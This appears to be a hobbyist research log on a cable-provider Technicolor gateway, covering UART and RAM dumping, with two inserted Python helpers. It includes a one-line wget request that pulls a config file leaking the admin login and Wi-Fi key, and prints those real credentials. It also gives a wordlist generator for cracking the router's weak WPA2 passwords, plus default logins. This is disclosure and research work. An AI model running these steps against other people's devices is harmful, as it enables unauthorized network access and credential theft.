-
uart commandline
01/21/2015 at 22:20
Finally I've got a unit the cable provider does not want back, so it is time to open it up and check for the two UART interfaces. One UART interface provides bootloader access, the other one the Linux console (/dev/ttyS0). There is one SPI flash of 1 MB, one parallel NAND flash chip and one DDR RAM chip.
<insert pic here>
The Linux login does not work (admin/admin): the session terminates immediately after login.
It is not possible to dump the flash content through the bootloader, because its memory dump function only handles addresses 0x80000000 and up. Fortunately the boot images seem to get loaded into this address space during bootup, which may make the system cold-boot-attackable: power up the device, reset it, and then dump the RAM contents from the bootloader. As dumping megabytes of data over UART takes ages, here is just the strings output of the first few dumped kilobytes after 0x80000000, to prove that it is at least possible to get some useful data out of this:
!@ @T@ b4BM Bldr 2.4.0alpha18p1 Bldr LVGbootloader image1 image2 linux linuxapps permnv dhtml dynnv linuxkfs ...
(These strings are used by the bootloader for the flash partition overview table printed on startup.)
Next step is to check the available address space (addresses that are too high crash the unit). If it is possible to address 128 MB after 0x80000000, the real physical memory is mapped at these addresses.
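Turning a serial capture of such a dump back into a binary and locating the strings by address, as an added example (not the author's tooling): it assumes a dump line format of an 8-digit hex address, a colon and big-endian 32-bit words, which is an assumption about this bootloader's output, and the embedded capture is constructed from the partition-name strings quoted above. Lines of serial noise are skipped, and missing address ranges are zero-padded and reported, so the offsets stay aligned with the real memory map.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of a serial-console capture of a bootloader memory dump.
# ASSUMPTION: one line = 8-hex-digit address, colon, then 32-bit words in hex,
# big-endian (MIPS BE is common on Broadcom SoCs). Adapt LINE_RE and the byte
# order to the real bootloader's output. The bytes spell out some of the
# partition-table strings quoted above; one line of serial noise is included,
# and the 0x80000040 line is deliberately missing.
SAMPLE_CAPTURE = """\
> d 0x80000000
80000000: 21402040 54402062 34424d00 426c6472
80000010: 20322e34 2e30616c 70686131 38703100
garbled line from serial noise $$%%
80000020: 696d6167 65310069 6d616765 32006c69
80000030: 6e757800 6c696e75 78617070 73000000
80000050: 7065726d 6e760064 68746d6c 00000000
>"""

LINE_RE = re.compile(r"^\s*([0-9a-fA-F]{8}):((?:\s+[0-9a-fA-F]{8})+)\s*$")


def parse_console_dump(capture: str) -> Tuple[int, bytes, List[Tuple[int, int]]]:
    """Turn a console capture of a memory dump into (base, data, gaps).

    Lines that do not look like dump lines (prompts, noise) are skipped.
    Missing address ranges are padded with 0x00 so offsets stay correct and
    are returned as (start, length) tuples so the analyst knows not to trust
    those bytes.
    """
    chunks: Dict[int, bytes] = {}
    for line in capture.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        addr = int(m.group(1), 16)
        words = m.group(2).split()
        chunks[addr] = b"".join(int(w, 16).to_bytes(4, "big") for w in words)
    if not chunks:
        raise ValueError("no dump lines recognised")
    base = min(chunks)
    out = bytearray()
    gaps: List[Tuple[int, int]] = []
    cursor = base
    for addr in sorted(chunks):
        if addr < cursor:
            raise ValueError(f"overlapping dump lines at {addr:#010x}")
        if addr > cursor:
            gaps.append((cursor, addr - cursor))
            out.extend(b"\x00" * (addr - cursor))
        out.extend(chunks[addr])
        cursor = addr + len(chunks[addr])
    return base, bytes(out), gaps


def find_strings(data: bytes, base: int, min_len: int = 4) -> List[Tuple[int, str]]:
    """Minimal `strings -t x` clone: printable ASCII runs with their address."""
    found: List[Tuple[int, str]] = []
    run_start = None
    for i, b in enumerate(data + b"\x00"):  # sentinel flushes a trailing run
        if 0x20 <= b < 0x7F:
            if run_start is None:
                run_start = i
        elif run_start is not None:
            if i - run_start >= min_len:
                found.append((base + run_start, data[run_start:i].decode("ascii")))
            run_start = None
    return found


if __name__ == "__main__":
    base, data, gaps = parse_console_dump(SAMPLE_CAPTURE)
    for start, length in gaps:
        print(f"warning: {length} bytes missing at {start:#010x} (zero-padded)")
    for addr, s in find_strings(data, base):
        print(f"{addr:#010x}  {s}")
```

Because the dump is reassembled by address rather than by line order, a capture with retransmitted or out-of-order lines still yields a correct image, and a reported gap tells you which region to dump again before trusting any string found next to it.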
from linux bootlog:
[ 21.310000] Serial: BCM63XX driver $Revision: 1.4 $
-
dump admin and wifi password from LAN
11/25/2014 at 20:11
Just do a
wget -q -O - http://192.168.0.1/goform/system/GatewaySettings.bin | strings
and receive
8021 !UPC1386571 * + SKKMRPXP 27354285 Broadcom Broadcom TechnicolorAP 123456 #0x000102030405060708090A0B0C0D0EBB 0000001 CDP. RG.. admin Technicolor clock.via.net ntp.nasa.gov tick.ucla.edu FIRE T802 UPC1386571 2.4G UPC0118016 SKKMRPXP EZXRXZZE THOMSON THOMSON SKKMRPXP THOMSON THOMSON THOMSON UPC. <Admin MLog admin admin
The last two lines are the admin login (user admin, password admin). I leave them set to their default config, because it does not increase security to change them...
The wireless name is UPC1386571 and the password SKKMRPXP:
Cell 08 - Address: 8C:04:FF:*:*:*
          Channel:11
          Frequency:2.462 GHz (Channel 11)
          Quality=54/70  Signal level=-56 dBm
          Encryption key:on
          ESSID:"UPC1386571"
          Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
                    24 Mb/s; 36 Mb/s; 54 Mb/s
          Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s
          Mode:Master
          Extra:tsf=00000008198c21d5
          Extra: Last beacon: 220ms ago
          IE: IEEE 802.11i/WPA2 Version 1
              Group Cipher : TKIP
              Pairwise Ciphers (2) : CCMP TKIP
              Authentication Suites (1) : PSK
          IE: WPA Version 1
              Group Cipher : TKIP
              Pairwise Ciphers (2) : CCMP TKIP
              Authentication Suites (1) : PSK
There is no way to disable wireless (or edit the password), because I am greeted with the error message
The connection to the server was reset while the page was loading.
if I try to access the "Wireless" settings tab in the web UI. It is also not possible to edit the dumped config file and write it back, because this is broken in the current software.
De facto, anyone who figures out the algorithm that calculates the wifi password based on... well, most probably just the MAC address or something else visible from the outside... can access my wireless network, which I never activated (btw. internet was ordered WITHOUT wifi, because they want extra money for it!). Even if the wifi password is truly "random", it is still only 8 characters, all uppercase letters, and so far only E S P K M R X Z have been observed (only 8 distinct letters!).
It is time to wrap that device in aluminium foil...
Edit: told you so... http://derstandard.at/2000028921659/UPC-Standard-WLAN-Passwoerter-kinderleicht-zu-knacken
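To put the 8-uppercase-letter observation into numbers, here is an added example (not from the original post) that derives the observed alphabet from the two WPA keys in the GatewaySettings.bin dump above, compares the nominal 26-letter keyspace with the one implied by the observed letters, and enumerates that reduced space lazily as a wordlist. The guess rate of 100,000 WPA2 PBKDF2 candidates per second is an assumed placeholder, not a measurement.

```python
import itertools
import math
import string
from typing import Dict, Iterable, Iterator

# Constructed from the two WPA keys visible in the config dump above.
OBSERVED_KEYS = ["SKKMRPXP", "EZXRXZZE"]


def observed_alphabet(keys: Iterable[str]) -> str:
    """Distinct characters seen across the observed keys, sorted."""
    seen = set("".join(keys))
    if not seen or not seen <= set(string.ascii_uppercase):
        raise ValueError("expected non-empty uppercase-only keys")
    return "".join(sorted(seen))


def keyspace_report(keys: Iterable[str], length: int = 8,
                    guesses_per_second: float = 100_000.0) -> Dict[str, object]:
    """Nominal (26 letters) vs observed-alphabet keyspace for `length`-char keys.

    guesses_per_second is an ASSUMED placeholder for a WPA2 PBKDF2 cracking
    rate; substitute a measured figure for the hardware at hand.
    """
    alphabet = observed_alphabet(keys)
    full = 26 ** length
    reduced = len(alphabet) ** length
    return {
        "alphabet": alphabet,
        "alphabet_size": len(alphabet),
        "full_keyspace": full,
        "reduced_keyspace": reduced,
        "full_bits": math.log2(full),
        "reduced_bits": math.log2(reduced),
        "full_days": full / guesses_per_second / 86400,
        "reduced_minutes": reduced / guesses_per_second / 60,
    }


def candidate_wordlist(alphabet: str, length: int = 8) -> Iterator[str]:
    """Lazily enumerate every key over `alphabet` in lexicographic order,
    e.g. to pipe into a WPA2 cracker; the list is never held in memory."""
    for tup in itertools.product(sorted(set(alphabet)), repeat=length):
        yield "".join(tup)


if __name__ == "__main__":
    report = keyspace_report(OBSERVED_KEYS)
    for k, v in report.items():
        print(f"{k:>18}: {v:,.2f}" if isinstance(v, float) else f"{k:>18}: {v}")
    gen = candidate_wordlist(str(report["alphabet"]))
    print("first candidates:", [next(gen) for _ in range(3)])
```

With the two observed keys the reduced alphabet is EKMPRSXZ: 8^8 is about 16.8 million candidates (24 bits) against 26^8 of about 209 billion (37.6 bits), so the observed structure cuts the brute-force effort by a factor of roughly 12,000 even before any MAC-derivation algorithm is known.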
I am sure TechnicolorAP / 123456 and the other strange strings are other login credentials, maybe used for telnet (did not try this on the internet-connected, KabelBW-provided unit):
Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'
Broadcom Corporation Embedded BFC Telnet Server (c) 2000-2008
WARNING: Access allowed by authorized users only.
Login:
Other source for CSRF vulnerabilities: https://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/